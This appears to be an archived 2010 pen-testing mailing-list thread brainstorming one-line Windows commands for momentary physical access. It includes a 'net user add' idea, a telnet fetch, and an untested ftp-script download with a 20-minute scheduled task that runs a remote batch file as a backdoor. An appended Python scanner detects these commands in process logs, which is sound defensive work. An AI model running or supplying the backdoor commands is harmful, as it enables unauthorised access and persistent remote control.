[Pauldotcom] Quick keyboard pwnage
Adrian Crenshaw
irongeek at irongeek.com
Wed Mar 17 01:52:26 UTC 2010
Nice, this is the sort of creative evil I'm looking for. :)
Thanks,
Adrian
On Tue, Mar 16, 2010 at 9:59 AM, Nathan Sweaney <NSweaney at tulsacash.com> wrote:
> Don't forget that telnet isn't installed by default on Vista & 7.
>
> What about something like this:
>
> echo open ftp.somesite.com > %WINDIR%\ftp.scr & echo anonymous >>
> %WINDIR%\ftp.scr & echo bill at gates.com >> %WINDIR%\ftp.scr & echo get
> script.bat >> %WINDIR%\ftp.scr & echo quit >> %WINDIR%\ftp.scr & echo ftp
> -s:ftp.scr > %WINDIR%\security.bat & echo start %WINDIR%\script.bat >>
> %WINDIR%\security.bat & schtasks /create /tn "Security Updates" /sc minute
> /mo 20 /tr security.bat
>
> I haven't tested it so I may have some syntax wrong, but the basic idea
> should work. Now your box just checks in every 20 minutes & does whatever
> you put in script.bat.
>
> If you wanted to get fancy, you could change script.bat to something like
> 123.123.123.123.bat (or whatever its external IP is). Then just check your
> server logs to see who is connecting & you can customize your scripts to
> each location. That may take a little more fancy kung fu to get your
> external IP though.
>
> nathan
>
>
> -----Original Message-----
> From: pauldotcom-bounces at mail.pauldotcom.com [mailto:
> pauldotcom-bounces at mail.pauldotcom.com] On Behalf Of Josh Olson
> Sent: Monday, March 15, 2010 11:46 AM
> To: PaulDotCom Security Weekly Mailing List
> Subject: Re: [Pauldotcom] Quick keyboard pwnage
>
> Adrian,
>
> I haven't been able to make this work, but perhaps with some tweaking,
> telnet and edlin can do it?
>
> Something like:
>
> telnet -f binary.exe
> o site.com port
> GET /path/to/binary.exe
> quit
>
> Then edlin binary.exe /B
> 1,3d
> e
>
> Note that edlin doesn't ship with 64-bit versions of Windows.
>
> Josh
>
> On Sun, Mar 14, 2010 at 2:10 PM, Adrian Crenshaw <irongeek at irongeek.com>
> wrote:
> > Hi All,
> > I need some ideas. Let's say you are the Flash (or Quicksilver if you
> > prefer Marvel comics), and could type uberfast. You have no storage device
> > with you, but like I said, you can type really fast. If you had momentary
> > access to a physical box (Windows or Linux, but I'm most interested in
> > Windows), what command would you run as a pen-tester?
> >
> > Ideas to get us started:
> > 1. Net user add obviously would be an option for some. (this I know the
> > command for)
> > 2. Anyone know a way to enter a binary at the command line and quickly run
> > it?
> > 3. Wget functionality in windows would be nice, then you could just grab exes
> > you want quickly.
> > 4. Quickly upload files off of the target system to someplace you control on
> > the internet.
> >
> > Extra point for simple commands, quick to type, and on one line. If I use
> > your idea, I'll be sure to thank you in the project notes/comments.
> >
> > Thanks,
> > Adrian
> >
> >
> > _______________________________________________
> > Pauldotcom mailing list
> > Pauldotcom at mail.pauldotcom.com
> > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> > Main Web Site: http://pauldotcom.com
> >
>
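The chain Nathan sketches above (a scripted `ftp -s:` pull of a batch file, then a minute-interval scheduled task that runs it) leaves a distinctive trail in process-creation telemetry, so the defensive counterpart is worth spelling out. The following is an added example, not code from the list or from any of the posters: a small Python scanner that applies pattern rules to constructed, simplified process-creation records (`user|parent|command line` is an assumed log layout, and every record below is made up for the demonstration) and then correlates the hits per user, so that the scripted ftp transfer and the minute-interval batch task together raise one combined alert rather than two unrelated ones.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation records, not real telemetry.
# Assumed simplified layout: "<user>|<parent process>|<command line>".
SAMPLE_LOG = """\
alice|explorer.exe|notepad.exe C:\\notes.txt
alice|cmd.exe|echo open ftp.somesite.com > C:\\Windows\\ftp.scr & echo anonymous >> C:\\Windows\\ftp.scr & echo quit >> C:\\Windows\\ftp.scr
alice|cmd.exe|ftp -s:ftp.scr
alice|cmd.exe|schtasks /create /tn "Security Updates" /sc minute /mo 20 /tr security.bat
bob|svchost.exe|schtasks /create /tn "Backup" /sc daily /st 02:00 /tr C:\\backup\\run.ps1
bob|cmd.exe|net user helpdesk P@ssw0rd /add
"""

# ftp.exe driven by a script file (-s:), the transport used in the thread.
FTP_SCRIPT_RE = re.compile(r"\bftp(\.exe)?\b[^|]*?\s-s:", re.IGNORECASE)
# echo redirected into a .scr file: the ftp script being assembled from cmd.
ECHO_TO_SCR_RE = re.compile(r"\becho\b.*>>?\s*\S+\.scr\b", re.IGNORECASE)
# schtasks creating a minute-interval task whose action is a batch file.
SCHTASKS_MINUTE_RE = re.compile(
    r"\bschtasks(\.exe)?\b.*?/create.*?/sc\s+minute.*?/tr\s+\"?[^\"\s]+\.(bat|cmd)\b",
    re.IGNORECASE | re.DOTALL,
)
# Local account creation, the first idea in Adrian's list.
NET_USER_ADD_RE = re.compile(r"\bnet(1)?(\.exe)?\s+user\b.*\s/add\b", re.IGNORECASE)

RULES = [
    ("ftp-scripted-transfer", FTP_SCRIPT_RE),
    ("ftp-script-written-via-echo", ECHO_TO_SCR_RE),
    ("schtasks-minute-interval-batch", SCHTASKS_MINUTE_RE),
    ("local-account-created", NET_USER_ADD_RE),
]


@dataclass
class Finding:
    user: str
    rule: str
    cmdline: str


def parse_line(line):
    """Split one record into (user, parent, cmdline); the command line may itself contain '|'."""
    user, parent, cmdline = line.split("|", 2)
    return user, parent, cmdline


def scan(log_text):
    """Return one Finding per (record, rule) pair that matches."""
    findings = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        user, _parent, cmdline = parse_line(raw)
        for name, rx in RULES:
            if rx.search(cmdline):
                findings.append(Finding(user, name, cmdline))
    return findings


def correlate(findings):
    """Map user -> set of rules hit, keeping only users who show the full
    chain from the thread: a scripted ftp pull plus a minute-interval batch task."""
    chain = {"ftp-scripted-transfer", "schtasks-minute-interval-batch"}
    by_user = {}
    for f in findings:
        by_user.setdefault(f.user, set()).add(f.rule)
    return {u: rules for u, rules in by_user.items() if chain <= rules}


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(f"[{h.rule}] {h.user}: {h.cmdline}")
    print("chained:", correlate(hits))
```

Each rule on its own is noisy (scheduled tasks and `ftp` both have legitimate uses), which is why `correlate` only escalates when the same user produces both halves of the chain; in a real deployment the per-user grouping would be per host and bounded by a time window.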